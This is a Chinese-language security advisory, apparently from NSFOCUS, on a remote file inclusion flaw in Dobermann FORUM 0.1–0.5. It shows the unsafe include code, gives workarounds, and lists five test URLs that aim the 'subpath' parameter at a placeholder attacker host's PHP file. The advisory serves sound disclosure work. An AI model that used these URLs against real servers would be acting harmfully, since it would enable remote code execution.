Benjamin Lefevre Dobermann Forum远程文件包含漏洞
发布日期:2002-10-28
更新日期:2002-11-07
受影响系统:Benjamin Lefevre Dobermann FORUM 0.5
Benjamin Lefevre Dobermann FORUM 0.4
Benjamin Lefevre Dobermann FORUM 0.3
Benjamin Lefevre Dobermann FORUM 0.2
Benjamin Lefevre Dobermann FORUM 0.1
描述:
BUGTRAQ ID:
6057
dobermann FORUM是一款由PHP编写基于WEB的论坛程序。
dobermann FORUM中部分脚本不正确使用Include()函数,远程攻击者可以利用这个漏洞包含远程服务器上的任意文件,导致文件中的代码以WEB进程权限执行。
论坛中entete.php,enteteacceuil.php,topic/entete.php脚本使用了如下代码:
<?php @include $$subpath."banniere.php "; >
但是没有对变量$$subpath进行定义,攻击者可以在自己控制的服务器上建立包含恶意PHP代码的文件,通过$$subpath变量包含远程服务器上的文件,可以导致以WEB进程权限执行文件中的PHP代码。
<*来源:Frog Man
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=103583521407007&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Frog Man 提供了如下测试方法:
http://[target]/entete.php?subpath=http://[attacker]/banniere.php
http://[target]/enteteacceuil.php?subpath=http://[attacker]/banniere.php
http://[target]/topic/entete.php?subpath=http://[attacker]/banniere.php
http://[target]/index.php?subpath=http://[attacker]/banniere.php
http://[target]/newtopic.php?subpath=http://[attacker]/banniere.php
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在php.ini配置文件中设置'allow_url_fopen'和'register_globals'为'off'。
* "'Frog Man'" <
leseulfrog@hotmail.com>提供了如下临时解决方案:
使用<?php $banfile=$subpath."banniere.php"; if (file_exists($banfile)){ @include $banfile; } ?> 代替如下代码:
<?php @include $subpath."banniere.php"; ?>
* "Mark Stunnenberg" <
marksg@chello.nl>提供了如下临时解决方案:
把如下行放置在$subpath变量设置之前:
<? $subpath = ''; ?>
厂商补丁:
Benjamin
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.le-dobermann.com/浏览次数:3127
严重程度:0(网友投票)